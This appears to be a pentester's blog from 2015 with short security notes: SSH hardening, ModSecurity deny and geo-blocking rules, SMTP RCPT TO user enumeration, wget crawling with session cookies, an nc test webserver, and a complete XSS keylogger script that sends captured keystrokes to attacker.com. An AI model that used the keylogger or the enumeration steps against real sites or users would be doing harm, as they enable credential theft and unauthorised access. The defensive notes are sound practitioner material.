Thursday, December 24, 2015

EICAR - How to test upload file antivirus protection doing security assessments



how to brute force local users using telnet on open SMTP relays


Sometimes doing a penetration test there is a open SMTP relay.
This can be used to brute force local users.

telnet <smtp-server> <port>

smtp> HELO test
smtp> MAIL FROM: bughunter@x1622.com
smtp> RCPT TO: admin@localhost
smtp> RCPT TO: root@localhost 
smtp> RCPT TO: test@localhost 
smtp> RCPT TO: local@localhost 
...

You will receive different responses if user exists or not. 

Wednesday, December 23, 2015

create huge file with random content in bash

Sometimes needed to create huge files with random stuff for penetration tests.

tr -dc A-Za-z0-9 </dev/urandom |dd of=/tmp/test.txt bs=1MB count=49 iflag=fullblock

count=<size-in-MB>

Microsoft Virtual Machines with different Internet Explorer Versions

Monday, December 21, 2015

SSH Disabling Password Authentication on Debian

/etc/ssh/sshd_config

set

PermitRootLogin no
PasswordAuthentication no
UsePAM no

How To Set Up SSH With Public-Key Authentication On Debian

https://www.howtoforge.com/set-up-ssh-with-public-key-authentication-debian-etch

Summary:
server> apt-get install ssh
client> mkdir ~/.ssh
client> chmod 700 ~/.ssh
client> cd ~/.ssh
client> ssh-keygen -t rsa -C "A comment"
client> scp -p id_rsa.pub remoteuser@remotehost:/tmp
server>ssh remoteuser@remotehost
server>mkdir ~/.ssh
server>chmod 700 ~/.ssh
server>cat /tmp/id_rsa.pub >> ~/.ssh/authorized_keys
server>chmod 600 ~/.ssh/authorized_keys
server>mv /tmp/id_rsa.pub ~/.ssh
server>logout
client> rm id_rsa.pub
client> ssh remoteuser@remotehost


Monday, December 14, 2015

simple rule to block JOOMLA 0-day code execution with MODSECURITY


based on the information provided at SUCURIs blog this simple MOD-SECURITY rule should block the attack.

SecRule REQUEST_HEADERS:User-Agent "JDatabaseDriverMysqli" "phase:1,t:none,log,deny,msg:'Joomla 0-day code execution'"


Thursday, December 10, 2015

RFC1918 Address Allocation for Private Internets

Private Address Space

The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets: 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix)

https://tools.ietf.org/html/rfc1918

Sunday, December 6, 2015

Three #DEFCON talks related to malware.


DEFCON 17: Making fun of your malware youtube
DEFCON 17: Malware Freakshow youtube
DEFCON 18: My Life As A Spyware Developer youtube 

Thursday, November 26, 2015

PCI DSS & PCI Penetration Testing Guidance



PCI Data Security Standard (PCI DSS)
https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf

PCI Data Security Standard   - Requirements and Security Assessment Procedures
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-1.pdf

Technical Guide to Information Security Testing and Assessment
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf



Wednesday, November 18, 2015

FIDDLER: Decrypt traffic from one hostname only

1) activate "Decrypt HTTPS traffic" ... from all processes inside Fiddler options.
2) Menu Rules  choose "Cutomize Rules.."
3) Search function "static function OnBeforeRequest(oSession: Session)"
4) Insert the following code (with your host name) inside the function

  if (oSession.HTTPMethodIs("CONNECT") &&
        !oSession.HostnameIs("www.onlyinterceptthishost.com"))
    {
        oSession["x-no-decrypt"] = "do not care.";
    }

thats all :)

More Details: http://docs.telerik.com/fiddler/Configure-Fiddler/Tasks/DecryptHTTPS


ModSecurity Handbook - very useful


Very useful :)




















=>GOOGLE BOOKS

Tuesday, November 17, 2015

Black/Whitelist Geolocation with ModSecurity

I had the request to Whitelist a special GEO location from one of my customers for his Web application. 

I analyzed current solutions with Cloudflare and others but most of them are charging regularly fees. 

I found this guide, how to set up GEPO Location checking with MOD SECURITY and choose this way. 
(Additionally I will create a cron job to update GEO location file once /month)



2) install MOD security

3) activate geo location DB in mod security configuration file

SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat
SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,pass,nolog"

4) block non us locations in custom rule file. for example allow only USA
SecRule GEO:COUNTRY_CODE3 "!@streq USA" "phase:1,t:none,log,deny,msg:'Client IP not from USA'"


That’s all. Cheap and fast :)

Monday, November 16, 2015

Articel: simulating low bandwith with chrome

bash cut & paste command injection

Its not a good idea to copy direct a BASH command from HTML pages into BASH without checking whats behind.

Example:

Copy "ls -al" from webpage and paste it into browser.




















Inside Clipboard can be various shell commands which gets executed pasteing them (In this example first line of /etc/passwd is shown)



The code behind the HTML page looks like:





Sunday, November 15, 2015

french flag in bash

cool :)

t=$(($(tput cols)/3));for FR in $(seq $(tput lines));do printf "\e[44m%${t}s\e[47m%${t}s\e[41m%${t}s\e[0m\n";done # French Flag


posten on twitter from @climagic

Articel: Know your enemies

Saturday, November 14, 2015

Bash Script Twitter client for Sysadmins :)



Call  ./twitter "#security"



Prerequiste: Twitter API key. Enter keyfile location in script line 16.

Script: http://pastebin.com/THMzVuQC



WGET to clone webpage


Easy way to crawl web pages/applications to store static content.

wget --keep-session-cookies --save-cookies c.txt --load-cookies c.txt --no-check-certificate -T 10 -x -r -nc <url-to-page>

To set different user agent add --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"

Cookie file must be in Netscape format. If webpage has a logout implemented, crawl the site until logout is stored, delete all other crawled pages and crawl with new session again. WGET does not crawl sites twice.

To bypass login you can create a cookie file with signed on session cookies.

# HTTP cookie file.
# Generated by Wget on 2015-11-14 09:18:02.
# Edit at your own risk.

www.page.com FALSE / FALSE 0 name cookie-value



Friday, November 13, 2015

bash: single line webserver with nc


setup a single line webserver in bash for test purposes can be very easy.

1) put the response page in a file
echo "<html><br>x1622 test webserver</br></html>">/tmp/response.txt

2) get the size of the file
ls -al /tmp/response.txt

3) start a simple webserver in bash using nc
while true; do { echo -e 'HTTP/1.1 200 OK\r\nContent-Length:43\r\nContent-Type:text/html\r\n'; cat /tmp/response.txt; } | sudo nc -l -p 80 -q 1; done

Other Content Types:
Content-Type="text/html", "image/png", "image/gif", "video/mpeg", "text/css", "text/plain"

4) call webpage with browser










5) webserver start & log










simplest PHP command shell ever :)


Simplest command shell to place on servers doing penetration tests, if system commands are not disabled.

shell:





usage:




Video: Troy Hunt - How I hacked my way to Norway


I really like this video from Troy Hunt.

https://vimeo.com/97530814 

One of World's worst places: Agbogbloshie




http://www.foxnews.com/tech/2014/03/06/welcome-to-hell-photographer-documents-africas-e-waste-nightmare.html

Agbogbloshie is a former wetland and suburb of Accra, Ghana known as a destination for locally generated used electronics from the City of Accra. It has been alleged to be at the center of a legal and illegal exportation network for the environmental dumping of electronic waste (e-waste) from industrialized nations.

https://en.wikipedia.org/wiki/Agbogbloshie

Articel: Voice Hero - The Inventor of Karaoke Speaks

Articel: Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice

Articel: Attacking the Network Time Protocol

Articel: Securing Blockchain.info Users with Tor and SSL



Good work, shows the need for HSTS and SSLSTRIP in action.
https://www.nikcub.com/posts/securing-blockchain-users-with-tor-and-ssl/

Kevin Mitnick: Live Hack at CeBIT Global Conferences 2015


Simple XSS Key Logger



var keys = '';

document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

window.setInterval(function(){
    new Image().src = 'http://attacker.com/keylogger.php?c=' + keys;
    keys = '';
}, 1000);

http://wiremask.eu/xss-keylogger/

Valid SSN for penetration tests

Valid SSN for pentesters  "Numbers from 987-65-4320 - 987-65-4329 are reserved for use in advertisements."

http://stackoverflow.com/questions/2313704/is-there-a-social-security-number-reserved-for-testing-examples

https://en.wikipedia.org/wiki/Social_Security_number

Using X-Frame-Options

Hunting for A+





Good decription how to harden Apache SSL Security FOLLOW LINK

Real 80' Hacker - The Man Who Got No Whammies






Something was very wrong. Here was this guy from nowhere, and he kept going around the board and hitting the bonus boxes every time. It was bedlam, I can tell you. And we couldn't stop this guy."

~ Michael Brockman, head of the CBS daytime programming department, 1984